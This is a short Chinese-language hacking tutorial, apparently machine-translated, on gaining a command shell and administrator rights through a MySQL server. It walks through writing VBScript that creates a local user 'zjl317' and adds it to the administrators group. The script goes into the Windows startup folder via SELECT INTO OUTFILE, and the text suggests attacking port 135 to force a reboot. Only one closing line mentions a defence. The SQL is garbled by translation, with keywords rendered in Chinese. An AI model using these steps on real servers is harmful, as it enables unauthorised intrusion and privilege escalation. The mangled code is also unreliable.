通过MySQL系统得到cmdshell方法和注意事项
点评:本文主要介绍了通过MySQL得到cmdshell的方式,这是不安全的设置很好。以后我们会采取一些预防措施。1。连接到其他MySQL服务器
MySQL U根H 192.168.0.1
mysql.exe这个程序是在bin目录中你安装MySQL
2。让我们看看服务器中的一些数据库。
显示数据库;
MySQL的默认安装将有两个数据库,如MySQL和测试,如果您看到其他数据库,则它是用户自己的数据库。
三.让我们进入数据库
使用测试;
我们将进入测试数据库。
4。看看我们已经在数据库中输入了哪些数据表
显示表;
在默认情况下,没有测试表。
以下是关键部分
5。在测试数据库中创建一个新表。
创建表A(CMD文本);
我们已经创建了一个名为A的新表,表中只有一个字段,字段名为CMD,还有一个文本文本。
6。将内容插入表中
MySQL >插入值(设置wshshell = CreateObject(名。壳));
MySQL >插入值(a wshshell.run(cmd.exe / c网用户zjl317 zjl317 添加
MySQL >插入值(B = wshshell.run(cmd.exe / C net localgroup administrators zjl317 添加
注意双引号、括号和0 ,我们将使用这三个命令创建一个VBS脚本!
7。好,现在让我们看看表A中的某个东西。
从一个;
我们将看到表中有三行数据,这就是我们刚刚输入的内容,确认输入的内容是无误的,我们将进入下一步。
8。输出表是一个VBS脚本文件
MySQL >选择*从一到输出文件的C:文件~ 1 1井~ 开始菜单程序启动 a.vbs ;
我们把我们的表的内容到启动组,一个VBS脚本文件!注意符号。
9、看到这个一定要知道,这是MySQL输出一个可执行文件的使用。为什么你不使用蝙蝠,因为会有一个明确的DOS窗口当你开始跑步,和VBS脚本可以完全隐藏窗口没有任何错误提示!本来应该有一个完整的脚本自动删除这个脚本,但是中文目录不能放弃治疗!好,找一个工具来攻击135,让服务器重新启动。几分钟后你就可以当管理员了。
警惕:在一般情况下,通过限制MySQL的流水账的权力,我们可以限制一些写MySQL账户运行文件的权限,如(VB,VBA,bat,cmd,等等)的后缀名的文件。人们经常用McAfee来实现,强烈推荐,更多的软件可以简称S.